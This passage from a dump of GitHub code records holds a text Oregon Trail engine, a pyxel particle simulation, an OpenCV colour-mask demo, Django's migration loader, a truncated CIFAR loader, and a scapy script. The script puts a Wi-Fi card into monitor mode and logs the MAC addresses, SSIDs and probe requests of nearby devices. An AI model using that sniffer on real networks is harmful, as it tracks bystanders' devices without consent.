self.player.travel(miles_to_travel)\n self.player.heal_all_if_sick()\n self.player.update_miles_to_next()\n \n # Update GUI.\n if not self.player.is_halfway:\n self.gui.draw_next_coord()\n self.gui.draw_next_coord()\n \n # Check for win condition.\n if self.player.miles_traveled >= self.player.win_mileage:\n self.should_close = True\n self.did_win = True\n # Check if lose condition should preceed win condition.\n if self.player.check_for_end_game(output=False):\n self.did_win = False\n else:\n print(\"You arrived at {}\".format(location.name))\n return\n \n # Check for lose condition before arriving.\n if self.player.check_for_end_game(output=False):\n self.should_close = True\n return\n \n print('You were prepared to travel {} miles but arrived at {}'.format(original_miles, location.name))\n print('You consumed {} pounds of food'.format(food_adjusted))\n print('You traveled {} day(s)'.format(int(days_elapsed*adjustment)))\n\n # Handle encountering the landmark.\n if location.kind == 'Fort':\n self.at_fort()\n elif location.kind == 'River':\n self.at_river(location)\n elif location.kind == None:\n self.at_landmark()\n self.player.update_next_location()\n \n # Travel without encountering landmark.\n else: \n print('You traveled {} miles in {} days'.format(miles_to_travel,days_elapsed))\n self.player.advance_time(days_elapsed)\n self.player.consume('food', food_consumed)\n print('You consumed {} pounds of food'.format(food_consumed))\n self.player.travel(miles_to_travel)\n self.player.heal_all_if_sick()\n \n # Update GUI if halfway to landmark.\n if self.player.should_draw_halfway():\n self.gui.draw_next_coord()\n \n def at_fort(self):\n \"\"\"\n Handles fort options.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n # Allow infinite resting/shopping.\n while not self.should_close:\n self.player.print_status()\n self.messages.print_message('fort_options')\n options = [1,2,3]\n response = io.get_input_int_protected(options)\n if response == 1:\n self.rest()\n elif response == 2:\n self.store(fort=True)\n elif response == 3:\n return\n \n 
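# Both branches above mutate game state (rest() advances days and consumes food, store() spends money), so a lose condition can arise inside this loop.\n 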
# Check for lose conditions.\n if self.player.check_for_end_game(output=False):\n self.should_close = True\n\n def at_river(self, location):\n \"\"\"\n Handles river options. Calls misfortunes if player fails river crossing.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n river_height = location.height\n \n # Allow infinite resting and attempts at crossing river.\n while not self.should_close:\n self.player.print_status()\n print(\"River Height: {} feet\".format(river_height))\n self.messages.print_message('river_options')\n options = [1,2,3,4]\n response = io.get_input_int_protected(options)\n # Rest.\n if response == 1:\n self.rest()\n \n # Ford.\n elif response == 2:\n if river_height > 3: # Fail fording rivers higher than 3ft.\n misfortunes.failed_river(self.player)\n else:\n print(\"You successfully forded the river\")\n return\n \n # Chaulk and float.\n elif response == 3:\n # 65% chance of succesful floating.\n chance = 65\n n_chance = list(range(1,chance + 1))\n if random.randint(1,100) in n_chance:\n print(\"You successfully floated the river\")\n return\n else:\n misfortunes.failed_river(self.player)\n \n # Ferry.\n elif response == 4:\n if self.player.can_consume('money',5):\n print(\"You took the ferry across\")\n self.player.consume('money',5)\n return\n else:\n print(\"You do not have enough money\")\n \n # Check for end game conditions.\n if self.player.check_for_end_game(output=False):\n self.should_close = True\n \n def at_landmark(self):\n \"\"\"\n Handles landmark options.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n # Allow infinite resting.\n while not self.should_close: \n self.player.print_status()\n self.messages.print_message('landmark_options')\n options = [1,2]\n response = io.get_input_int_protected(options)\n \n # Rest.\n if response == 1:\n self.rest()\n \n # Continue.\n elif response == 2:\n return\n \n # Check for end game.\n if self.player.check_for_end_game(output=False):\n self.should_close = True\n \n def rest(self):\n \"\"\"\n Advances time a random amount and consumes the appropiate amount of food.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n random.seed()\n \n # Rest between 1,3 days, calculate food consumed.\n days_to_sleep = random.randint(1,3)\n food_consumed = self.player.members_alive * self.player.rations * days_to_sleep\n print('You decided to rest for {} day(s)'.format(days_to_sleep))\n print('You consumed {} pounds of food'.format(food_consumed))\n \n # Update game-state.\n self.player.advance_time(days_to_sleep)\n self.player.consume('food', food_consumed)\n self.player.heal_all_to_full_if_sick()\n \n def run(self):\n \"\"\"\n Main game loop.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n self.new_game()\n self.store()\n self.pick_start_date()\n while not self.should_close:\n self.take_turn()\n self.close()\n \n def close(self):\n \"\"\"\n Report game win/lose/quit to player and perform any cleanup.\n Exit point for program.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n if self.did_win:\n print(\"Congratulations you successfully navigated the trail!\")\n elif not self.did_quit:\n print(\"Sorry, you have lost the game. Play again soon!\")\n elif self.did_quit:\n print(\"Sorry you had to leave early. 
Play again soon!\")\n input(\"Enter any key to exit \\n>>> \")\n \n # Perform cleanup.\n self.gui.close()\n\ndef main():\n \"\"\"\n Program entry point.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n e = engine()\n e.run()\n #e.run_tests(debug=True)\n \n# Define program entry point.\nif __name__ == \"__main__\":\n main()\n","repo_name":"brajkowski/OregonTrail","sub_path":"modules/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":16324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19450177624","text":" \nimport math\nimport pyxel \nimport array\nimport random\n\nSCREEN_WIDTH = 120\nSCREEN_HEIGHT = 120\nEMPTY = 0\nVAPOR = 8\nWATER = 5\nSLIMECORE = 6\nSLIME = 7\nINVALID = -1\nVALID = 0\nSLIMETIMEMAX = 50\nSLIMEMOVEMAX = 40\nSLIMESIZE = 300\n\nclass Vec2:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.magnitude = math.sqrt(x * x + y * y) \n def normalized(self):\n self.x = self.x / self.magnitude \n self.y = self.y / self.magnitude\n self.magnitude = 1\n \n\nclass Map:\n TOPLEFT = Vec2(-1,-1)\n TOPRIGHT = Vec2(1,-1)\n TOP = Vec2(0,-1)\n LEFT = Vec2(-1,0)\n RIGHT = Vec2(1,0)\n BOTLEFT = Vec2(-1,1)\n BOTRIGHT = Vec2(1,1)\n BOT = Vec2(0,1)\n def __init__(self, width, height):\n self.map = [0 for x in range(height * width)]\n self.width = width\n self.height = height\n \n def get(self, x, y):\n if(x < 0 or x >= self.width or y < 0 or y >= self.height):\n return INVALID\n return self.map[y*self.width + x]\n \n def set(self, x, y, num):\n if(x < 0 or x >= self.width or y < 0 or y >= self.height):\n return INVALID\n self.map[y*self.width + x] = num\n return VALID\n \nmapv2 = Map(SCREEN_WIDTH,SCREEN_HEIGHT)\n\nclass Vec2_normalized: \n def __init__(self, x, y): \n self.magnitude = math.sqrt(x * x + y * y) \n self.x = x / self.magnitude \n self.y = y / self.magnitude\n\n \nclass Pixel:\n def __init__(self, px, py, type):\n self.position = Vec2(px, py)\n self.type = type\n self.moved = False\n mapv2.set(self.position.x,self.position.y, type)\n if(type == SLIME):\n self.corepos = Vec2(0,0)\n self.offset = Vec2(0,0)\n self.state = 0\n self.timeleft = 0\n self.movesleft = 0\n if(type == SLIMECORE):\n self.slimebod = [Pixel(px,py,SLIME) for x in range(SLIMESIZE)]\n \n def draw(self):\n pyxel.pix(self.position.x,self.position.y, self.type)\n if(self.type == SLIMECORE):\n for x in self.slimebod:\n x.draw()\n \n def peek(self, num):\n res = mapv2.get(self.position.x + num.x, self.position.y + num.y)\n return res\n \n def try_teleport(self, pos):\n res = mapv2.get(pos.x , pos.y )\n if res == EMPTY:\n mapv2.set(self.position.x, self.position.y, EMPTY)\n self.position.x = pos.x\n self.position.y = pos.y\n mapv2.set(self.position.x, self.position.y, self.type)\n self.moved = True\n return res\n \n \n def try_go(self,num):\n res = mapv2.get(self.position.x + num.x, self.position.y + num.y)\n if res == EMPTY:\n mapv2.set(self.position.x, self.position.y, EMPTY)\n self.position.x += num.x\n self.position.y += num.y\n mapv2.set(self.position.x, self.position.y, self.type)\n self.moved = True\n return res\n \n \n ### this is the state machine for water sim ###\n \n # try go down then bot left or bot right\n def node_0(self):\n res = self.try_go(Map.BOT)\n if res == INVALID:\n return 4\n elif res == EMPTY:\n return 7\n else:\n return 1\n # rand for bot left / bot right\n def node_1(self):\n num = random.randint(0, 1)\n if num == 1:\n return 2\n else:\n return 3\n #bot left\n def node_2(self):\n res = 
self.try_go(Map.BOTLEFT)\n return 4\n # bot right\n def node_3(self):\n res = self.try_go(Map.BOTRIGHT)\n return 4\n # rand for left / right\n def node_4(self):\n num = random.randint(0, 2)\n if num == 1:\n return 5\n elif num == 2:\n return 6\n else:\n return 7\n # left\n def node_5(self):\n res = self.try_go(Map.LEFT)\n return 7\n # right\n def node_6(self):\n res = self.try_go(Map.RIGHT)\n return 7\n # setting positions in the map\n def node_7(self):\n self.updating = False\n return 0\n # go up\n def node_8(self):\n res = self.try_go(Map.TOP)\n if res == INVALID:\n return 4\n elif res == EMPTY:\n return 7\n else:\n return 9\n # rand for top left / top right\n def node_9(self):\n num = random.randint(0, 1)\n if num == 1:\n return 10\n else:\n return 11\n # top left\n def node_10(self):\n res = self.try_go(Map.TOPLEFT)\n return 4\n # top right\n def node_11(self):\n res = self.try_go(Map.TOPRIGHT)\n return 4\n \n def node_12(self):\n if self.peek(Map.TOP) != EMPTY:\n res = self.try_go(Map.BOT)\n if res == EMPTY:\n return 7\n else:\n return 4\n return 7\n \n # try go down then left or right\n def node_13(self):\n res = self.try_go(Map.BOT)\n if res == EMPTY:\n return 7\n else:\n return 4\n \n \n FUNC_MAP = { 0: node_0, 1: node_1, 2: node_2, 3: node_3, 4: node_4, 5: node_5, 6: node_6, 7: node_7, 8: node_8, 9: node_9, 10: node_10, 11: node_11, 12: node_12, 13: node_13 }\n START_NODE = { WATER: 13, VAPOR: 8 , SLIMECORE: 7, SLIME: 13}\n \n def VAPOR_SPECIFIC_UPDATE(self):\n num = random.randint(0,200)\n if num == 5:\n if mapv2.get(self.position.x , self.position.y + 1) == EMPTY:\n num = mapv2.get(self.position.x - 1, self.position.y - 1) + \\\n mapv2.get(self.position.x + 1, self.position.y - 1) + \\\n mapv2.get(self.position.x, self.position.y - 1)\n if (num == 24):\n self.type = WATER\n \n def WATER_SPECIFIC_UPDATE(self):\n num = random.randint(0,200)\n if num == 5:\n if mapv2.get(self.position.x , self.position.y - 1) == EMPTY:\n num = mapv2.get(self.position.x - 1, self.position.y + 1) + \\\n mapv2.get(self.position.x + 1, self.position.y + 1) + \\\n mapv2.get(self.position.x, self.position.y + 1)\n if (num == 15):\n self.type = VAPOR\n \n def SLIMECORE_SPECIFIC_UPDATE(self):\n \n for x in self.slimebod:\n mapv2.set(x.position.x, x.position.y, EMPTY)\n \n if pyxel.btnp(pyxel.KEY_A,1,1): \n self.try_go(Map.LEFT)\n if pyxel.btnp(pyxel.KEY_D,1,1): \n self.try_go(Map.RIGHT)\n if pyxel.btnp(pyxel.KEY_W,1,1): \n self.try_go(Map.TOP)\n if pyxel.btnp(pyxel.KEY_S,1,1): \n self.try_go(Map.BOT)\n \n for x in self.slimebod:\n mapv2.set(x.position.x, x.position.y, SLIME)\n \n mapv2.set(self.position.x, self.position.y, SLIMECORE)\n \n for x in self.slimebod:\n x.corepos.x = self.position.x\n x.corepos.y = self.position.y\n x.update()\n \n def SLIME_SPECIFIC_UPDATE(self):\n self.updating = True\n \n if self.timeleft <= 0 or self.movesleft <= 0:\n pos = Vec2(0,0)\n pos.x = self.corepos.x + random.randint(-2,2)\n pos.y = self.corepos.y + random.randint(-3,5)\n if self.try_teleport(pos) == EMPTY:\n self.timeleft = SLIMETIMEMAX\n self.movesleft = SLIMEMOVEMAX\n \n def WATER_POST_UPDATE(self):\n pass\n \n def VAPOR_POST_UPDATE(self):\n pass\n \n def SLIMECORE_POST_UPDATE(self):\n pass\n \n def SLIME_POST_UPDATE(self):\n if self.moved:\n self.movesleft -= 1\n self.timeleft -=1\n \n SPECIFIC_UPDATE = { \n WATER: WATER_SPECIFIC_UPDATE, \n VAPOR: VAPOR_SPECIFIC_UPDATE, \n SLIMECORE: SLIMECORE_SPECIFIC_UPDATE, \n SLIME: SLIME_SPECIFIC_UPDATE\n }\n \n POST_SPECIFIC_UPDATE = { \n WATER: WATER_POST_UPDATE, \n VAPOR: 
VAPOR_POST_UPDATE, \n SLIMECORE: SLIMECORE_POST_UPDATE, \n SLIME: SLIME_POST_UPDATE\n }\n \n def update(self):\n self.updating = True\n self.moved = False\n Pixel.SPECIFIC_UPDATE[self.type](self)\n res = Pixel.START_NODE[self.type]\n while self.updating:\n res = Pixel.FUNC_MAP[res](self)\n Pixel.POST_SPECIFIC_UPDATE[self.type](self)\n \npixelarray = []\n\n\n\nclass App: \n def __init__(self): \n pyxel.init(SCREEN_WIDTH, SCREEN_HEIGHT)\n # shows the mouse\n pyxel.mouse(True)\n self.sandarray = []\n self.Paused = True\n pyxel.run(self.update, self.draw)\n \n def update(self): \n if pyxel.btnp(pyxel.KEY_Q): \n pyxel.quit()\n if pyxel.btnp(pyxel.MOUSE_LEFT_BUTTON):\n pixelarray.append(Pixel(pyxel.mouse_x, pyxel.mouse_y, SLIMECORE))\n #if pyxel.btnp(pyxel.MOUSE_LEFT_BUTTON, 1, 1):\n # for i in range(-5,5):\n # for j in range(-5,5):\n # if(mapv2.get(pyxel.mouse_x + i,pyxel.mouse_y + j) == EMPTY):\n # pixelarray.append(Pixel(pyxel.mouse_x + i, pyxel.mouse_y + j, WATER) )\n if pyxel.btnp(pyxel.MOUSE_RIGHT_BUTTON, 1, 1):\n for i in range(-5,5):\n for j in range(-5,5):\n if(mapv2.get(pyxel.mouse_x + i,pyxel.mouse_y + j) == EMPTY):\n pixelarray.append(Pixel(pyxel.mouse_x + i, pyxel.mouse_y + j, WATER) )\n \n if pyxel.btnp(pyxel.KEY_P):\n self.Paused = not self.Paused\n \n if self.Paused == False or pyxel.btnp(pyxel.KEY_C):\n for y in pixelarray:\n y.update()\n\n def draw(self):\n pyxel.cls(0)\n for y in pixelarray:\n y.draw()\n \nApp()\n","repo_name":"lamjiajin/PythonGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16276168623","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/3/26 11:18 PM\n# @Author : lizheng\n# @FileName: demo4.py.py\n# @Software: PyCharm\n\n## Extract regions of different colors via the HSV color space\nimport cv2\n\nimport numpy as np\n\nopencv=cv2.imread(\"../images/opencv-logo.png\")\n\nhsv=cv2.cvtColor(opencv,cv2.COLOR_BGR2HSV)\n\ncv2.imshow('opencv',opencv)\n\n#============= Specify the blue value range =============\n\nminBlue=np.array([110,50,50])\n\nmaxBlue=np.array([130,255,255])\n\n# Identify the blue region\n\nmask=cv2.inRange(hsv,minBlue,maxBlue)\n\n# Lock onto the blue region with a mask-controlled bitwise AND\n\nblue=cv2.bitwise_and(opencv,opencv,mask=mask)\n\ncv2.imshow('blue',blue)\n\n#============= Specify the green value range =============\n\nminGreen=np.array([50,50,50])\n\nmaxGreen=np.array([70,255,255])\n\n# Identify the green region\nmask=cv2.inRange(hsv,minGreen,maxGreen)\n\n# Lock onto the green region with a mask-controlled bitwise AND\n\ngreen=cv2.bitwise_and(opencv,opencv,mask=mask)\n\ncv2.imshow('green',green)\n\n#============= Specify the red value range =============\n\nminRed=np.array([0,50,50])\n\nmaxRed=np.array([30,255,255])\n\n# Identify the red region\n\nmask=cv2.inRange(hsv,minRed,maxRed)\n\n# Lock onto the red region with a mask-controlled bitwise AND\n\nred=cv2.bitwise_and(opencv,opencv,mask=mask)\n\ncv2.imshow('red',red)\n\ncv2.waitKey()\n\ncv2.destroyAllWindows()","repo_name":"LiZheng1997/OpenCV_Practice","sub_path":"Chapters/Chapter4/demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30600789841","text":"#!/usr/local/bin/python3\n# coding=utf8\nimport os\nfrom scapy.all import *\n\n#here is your interface in monitor mode\niface=\"wlan1\"\n\nos.system(\"ifconfig \" + iface + \" down\") \nos.system(\"iwconfig \" + iface + \" mode monitor\")\nos.system(\"ifconfig \" + iface + \" up\")\n\nstation_list = []\nclient_list = []\n\ndef PacketHandler(pkt) :\n\n\tif pkt.haslayer(Dot11) :\n\t\t#print(pkt.command())\n\t\t#check if it's a station\n\t\tif 
pkt.type == 0 and pkt.subtype == 8 :\n\t\t\t#check mac address for redundancy\n\t\t\t#if pkt.addr2 not in station_list :\n\t\t\t\t#station_list.append(pkt.addr2) \n\t\t\t\tprint(\"Station - MAC: \" + str(pkt.addr2).strip() +\" Signal: \"+ str(pkt.db_antsignal) +\" SSID: \" + str(pkt.info).strip('b\\''))\n\t\t#or check if it's a client\n\t\telif pkt.type == 0 and pkt.subtype == 4 :\n\t\t\t#check mac address for redundancy\n\t\t\t#if pkt.addr2 not in client_list :\n\t\t\t\t#client_list.append(pkt.addr2)\n\t\t\t\tprint(\"Client - MAC: \" + str(pkt.addr2).strip() + \" Probe: \" + str(pkt.info).strip('b\\''))\n\n\n#sniff(iface=iface, prn = PacketHandler)\n\n\nwhile True:\n\tfor channel in range(1, 14):\n\t\tos.system(\"iwconfig \" + iface + \" channel \" + str(channel))\n\t\tprint (\"Sniffing on channel \" + str(channel))\n\n\t\tsniff(iface=iface, prn=PacketHandler, count=10, timeout=1, store=0)\n\t\ttime.sleep(1)","repo_name":"studioalgorhythmics/sensoriumofanimals_github","sub_path":"wifi_sensing/scripts/list_scapy.py","file_name":"list_scapy.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6300322605","text":"import pkgutil\nimport sys\nfrom importlib import import_module, reload\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.db.migrations.graph import MigrationGraph\nfrom django.db.migrations.recorder import MigrationRecorder\n\nfrom .exceptions import (\n AmbiguityError,\n BadMigrationError,\n InconsistentMigrationHistory,\n NodeNotFoundError,\n)\n\nMIGRATIONS_MODULE_NAME = \"migrations\"\n\n\nclass MigrationLoader:\n \"\"\"\n Load migration files from disk and their status from the database.\n\n Migration files are expected to live in the \"migrations\" directory of\n an app. Their names are entirely unimportant from a code perspective,\n but will probably follow the 1234_name.py convention.\n\n On initialization, this class will scan those directories, and open and\n read the Python files, looking for a class called Migration, which should\n inherit from django.db.migrations.Migration. See\n django.db.migrations.migration for what that looks like.\n\n Some migrations will be marked as \"replacing\" another set of migrations.\n These are loaded into a separate set of migrations away from the main ones.\n If all the migrations they replace are either unapplied or missing from\n disk, then they are injected into the main set, replacing the named migrations.\n Any dependency pointers to the replaced migrations are re-pointed to the\n new migration.\n\n This does mean that this class MUST also talk to the database as well as\n to disk, but this is probably fine. 
We're already not just operating\n in memory.\n \"\"\"\n\n def __init__(\n self,\n connection,\n load=True,\n ignore_no_migrations=False,\n replace_migrations=True,\n ):\n self.connection = connection\n self.disk_migrations = None\n self.applied_migrations = None\n self.ignore_no_migrations = ignore_no_migrations\n self.replace_migrations = replace_migrations\n if load:\n self.build_graph()\n\n @classmethod\n def migrations_module(cls, app_label):\n \"\"\"\n Return the path to the migrations module for the specified app_label\n and a boolean indicating if the module is specified in\n settings.MIGRATION_MODULE.\n \"\"\"\n if app_label in settings.MIGRATION_MODULES:\n return settings.MIGRATION_MODULES[app_label], True\n else:\n app_package_name = apps.get_app_config(app_label).name\n return \"%s.%s\" % (app_package_name, MIGRATIONS_MODULE_NAME), False\n\n def load_disk(self):\n \"\"\"Load the migrations from all INSTALLED_APPS from disk.\"\"\"\n self.disk_migrations = {}\n self.unmigrated_apps = set()\n self.migrated_apps = set()\n for app_config in apps.get_app_configs():\n # Get the migrations module directory\n module_name, explicit = self.migrations_module(app_config.label)\n if module_name is None:\n self.unmigrated_apps.add(app_config.label)\n continue\n was_loaded = module_name in sys.modules\n try:\n module = import_module(module_name)\n except ModuleNotFoundError as e:\n if (explicit and self.ignore_no_migrations) or (\n not explicit and MIGRATIONS_MODULE_NAME in e.name.split(\".\")\n ):\n self.unmigrated_apps.add(app_config.label)\n continue\n raise\n else:\n # Module is not a package (e.g. migrations.py).\n if not hasattr(module, \"__path__\"):\n self.unmigrated_apps.add(app_config.label)\n continue\n # Empty directories are namespaces. Namespace packages have no\n # __file__ and don't use a list for __path__. 
See\n # https://docs.python.org/3/reference/import.html#namespace-packages\n if getattr(module, \"__file__\", None) is None and not isinstance(\n module.__path__, list\n ):\n self.unmigrated_apps.add(app_config.label)\n continue\n # Force a reload if it's already loaded (tests need this)\n if was_loaded:\n reload(module)\n self.migrated_apps.add(app_config.label)\n migration_names = {\n name\n for _, name, is_pkg in pkgutil.iter_modules(module.__path__)\n if not is_pkg and name[0] not in \"_~\"\n }\n # Load migrations\n for migration_name in migration_names:\n migration_path = \"%s.%s\" % (module_name, migration_name)\n try:\n migration_module = import_module(migration_path)\n except ImportError as e:\n if \"bad magic number\" in str(e):\n raise ImportError(\n \"Couldn't import %r as it appears to be a stale \"\n \".pyc file.\" % migration_path\n ) from e\n else:\n raise\n if not hasattr(migration_module, \"Migration\"):\n raise BadMigrationError(\n \"Migration %s in app %s has no Migration class\"\n % (migration_name, app_config.label)\n )\n self.disk_migrations[\n app_config.label, migration_name\n ] = migration_module.Migration(\n migration_name,\n app_config.label,\n )\n\n def get_migration(self, app_label, name_prefix):\n \"\"\"Return the named migration or raise NodeNotFoundError.\"\"\"\n return self.graph.nodes[app_label, name_prefix]\n\n def get_migration_by_prefix(self, app_label, name_prefix):\n \"\"\"\n Return the migration(s) which match the given app label and name_prefix.\n \"\"\"\n # Do the search\n results = []\n for migration_app_label, migration_name in self.disk_migrations:\n if migration_app_label == app_label and migration_name.startswith(\n name_prefix\n ):\n results.append((migration_app_label, migration_name))\n if len(results) > 1:\n raise AmbiguityError(\n \"There is more than one migration for '%s' with the prefix '%s'\"\n % (app_label, name_prefix)\n )\n elif not results:\n raise KeyError(\n f\"There is no migration for '{app_label}' with the prefix \"\n f\"'{name_prefix}'\"\n )\n else:\n return self.disk_migrations[results[0]]\n\n def check_key(self, key, current_app):\n if (key[1] != \"__first__\" and key[1] != \"__latest__\") or key in self.graph:\n return key\n # Special-case __first__, which means \"the first migration\" for\n # migrated apps, and is ignored for unmigrated apps. 
It allows\n # makemigrations to declare dependencies on apps before they even have\n # migrations.\n if key[0] == current_app:\n # Ignore __first__ references to the same app (#22325)\n return\n if key[0] in self.unmigrated_apps:\n # This app isn't migrated, but something depends on it.\n # The models will get auto-added into the state, though\n # so we're fine.\n return\n if key[0] in self.migrated_apps:\n try:\n if key[1] == \"__first__\":\n return self.graph.root_nodes(key[0])[0]\n else: # \"__latest__\"\n return self.graph.leaf_nodes(key[0])[0]\n except IndexError:\n if self.ignore_no_migrations:\n return None\n else:\n raise ValueError(\n \"Dependency on app with no migrations: %s\" % key[0]\n )\n raise ValueError(\"Dependency on unknown app: %s\" % key[0])\n\n def add_internal_dependencies(self, key, migration):\n \"\"\"\n Internal dependencies need to be added first to ensure `__first__`\n dependencies find the correct root node.\n \"\"\"\n for parent in migration.dependencies:\n # Ignore __first__ references to the same app.\n if parent[0] == key[0] and parent[1] != \"__first__\":\n self.graph.add_dependency(migration, key, parent, skip_validation=True)\n\n def add_external_dependencies(self, key, migration):\n for parent in migration.dependencies:\n # Skip internal dependencies\n if key[0] == parent[0]:\n continue\n parent = self.check_key(parent, key[0])\n if parent is not None:\n self.graph.add_dependency(migration, key, parent, skip_validation=True)\n for child in migration.run_before:\n child = self.check_key(child, key[0])\n if child is not None:\n self.graph.add_dependency(migration, child, key, skip_validation=True)\n\n def build_graph(self):\n \"\"\"\n Build a migration dependency graph using both the disk and database.\n You'll need to rebuild the graph if you apply migrations. This isn't\n usually a problem as generally migration stuff runs in a one-shot process.\n \"\"\"\n # Load disk data\n self.load_disk()\n # Load database data\n if self.connection is None:\n self.applied_migrations = {}\n else:\n recorder = MigrationRecorder(self.connection)\n self.applied_migrations = recorder.applied_migrations()\n # To start, populate the migration graph with nodes for ALL migrations\n # and their dependencies. 
Also make note of replacing migrations at this step.\n self.graph = MigrationGraph()\n self.replacements = {}\n for key, migration in self.disk_migrations.items():\n self.graph.add_node(key, migration)\n # Replacing migrations.\n if migration.replaces:\n self.replacements[key] = migration\n for key, migration in self.disk_migrations.items():\n # Internal (same app) dependencies.\n self.add_internal_dependencies(key, migration)\n # Add external dependencies now that the internal ones have been resolved.\n for key, migration in self.disk_migrations.items():\n self.add_external_dependencies(key, migration)\n # Carry out replacements where possible and if enabled.\n if self.replace_migrations:\n for key, migration in self.replacements.items():\n # Get applied status of each of this migration's replacement\n # targets.\n applied_statuses = [\n (target in self.applied_migrations) for target in migration.replaces\n ]\n # The replacing migration is only marked as applied if all of\n # its replacement targets are.\n if all(applied_statuses):\n self.applied_migrations[key] = migration\n else:\n self.applied_migrations.pop(key, None)\n # A replacing migration can be used if either all or none of\n # its replacement targets have been applied.\n if all(applied_statuses) or (not any(applied_statuses)):\n self.graph.remove_replaced_nodes(key, migration.replaces)\n else:\n # This replacing migration cannot be used because it is\n # partially applied. Remove it from the graph and remap\n # dependencies to it (#25945).\n self.graph.remove_replacement_node(key, migration.replaces)\n # Ensure the graph is consistent.\n try:\n self.graph.validate_consistency()\n except NodeNotFoundError as exc:\n # Check if the missing node could have been replaced by any squash\n # migration but wasn't because the squash migration was partially\n # applied before. In that case raise a more understandable exception\n # (#23556).\n # Get reverse replacements.\n reverse_replacements = {}\n for key, migration in self.replacements.items():\n for replaced in migration.replaces:\n reverse_replacements.setdefault(replaced, set()).add(key)\n # Try to reraise exception with more detail.\n if exc.node in reverse_replacements:\n candidates = reverse_replacements.get(exc.node, set())\n is_replaced = any(\n candidate in self.graph.nodes for candidate in candidates\n )\n if not is_replaced:\n tries = \", \".join(\"%s.%s\" % c for c in candidates)\n raise NodeNotFoundError(\n \"Migration {0} depends on nonexistent node ('{1}', '{2}'). 
\"\n                        \"Django tried to replace migration {1}.{2} with any of [{3}] \"\n                        \"but wasn't able to because some of the replaced migrations \"\n                        \"are already applied.\".format(\n                            exc.origin, exc.node[0], exc.node[1], tries\n                        ),\n                        exc.node,\n                    ) from exc\n            raise\n        self.graph.ensure_not_cyclic()\n\n    def check_consistent_history(self, connection):\n        \"\"\"\n        Raise InconsistentMigrationHistory if any applied migrations have\n        unapplied dependencies.\n        \"\"\"\n        recorder = MigrationRecorder(connection)\n        applied = recorder.applied_migrations()\n        for migration in applied:\n            # If the migration is unknown, skip it.\n            if migration not in self.graph.nodes:\n                continue\n            for parent in self.graph.node_map[migration].parents:\n                if parent not in applied:\n                    # Skip unapplied squashed migrations that have all of their\n                    # `replaces` applied.\n                    if parent in self.replacements:\n                        if all(\n                            m in applied for m in self.replacements[parent].replaces\n                        ):\n                            continue\n                    raise InconsistentMigrationHistory(\n                        \"Migration {}.{} is applied before its dependency \"\n                        \"{}.{} on database '{}'.\".format(\n                            migration[0],\n                            migration[1],\n                            parent[0],\n                            parent[1],\n                            connection.alias,\n                        )\n                    )\n\n    def detect_conflicts(self):\n        \"\"\"\n        Look through the loaded graph and detect any conflicts - apps\n        with more than one leaf migration. Return a dict of the app labels\n        that conflict with the migration names that conflict.\n        \"\"\"\n        seen_apps = {}\n        conflicting_apps = set()\n        for app_label, migration_name in self.graph.leaf_nodes():\n            if app_label in seen_apps:\n                conflicting_apps.add(app_label)\n            seen_apps.setdefault(app_label, set()).add(migration_name)\n        return {\n            app_label: sorted(seen_apps[app_label]) for app_label in conflicting_apps\n        }\n\n    def project_state(self, nodes=None, at_end=True):\n        \"\"\"\n        Return a ProjectState object representing the most recent state\n        that the loaded migrations represent.\n\n        See graph.make_state() for the meaning of \"nodes\" and \"at_end\".\n        \"\"\"\n        return self.graph.make_state(\n            nodes=nodes, at_end=at_end, real_apps=self.unmigrated_apps\n        )\n\n    def collect_sql(self, plan):\n        \"\"\"\n        Take a migration plan and return a list of collected SQL statements\n        that represent the best-efforts version of that plan.\n        \"\"\"\n        statements = []\n        state = None\n        for migration, backwards in plan:\n            with self.connection.schema_editor(\n                collect_sql=True, atomic=migration.atomic\n            ) as schema_editor:\n                if state is None:\n                    state = self.project_state(\n                        (migration.app_label, migration.name), at_end=False\n                    )\n                if not backwards:\n                    state = migration.apply(state, schema_editor, collect_sql=True)\n                else:\n                    state = migration.unapply(state, schema_editor, collect_sql=True)\n            statements.extend(schema_editor.collected_sql)\n        return statements\n","repo_name":"django/django","sub_path":"django/db/migrations/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":16863,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"}
{"seq_id":"10505774302","text":"import numpy as np\nimport pickle, sys\n\ndef load_CIFAR_batch(filename):\n    \"\"\" load single batch of cifar \"\"\"\n    with open(filename, 'rb') as f:\n        datadict = pickle.load(f,encoding='bytes')\n        # with encoding='bytes' the keys of a Python 2 pickle are bytes, not str\n        X = datadict[b'data']\n        Y = datadict[b'labels']\n        X = X.reshape(10000, 3, 32, 32).transpose(0, 2, 3, 1).astype(\"float\")\n        Y = np.array(Y)\n        return X, Y\n\n\ndef load_CIFAR10(ROOT):\n    \"\"\" load all of cifar \"\"\"\n    xs = []\n    ys = []\n    for b in range(1, 6):\n        # f = os.path.join(ROOT, 'data_batch_%d' % (b,))\n        f = 
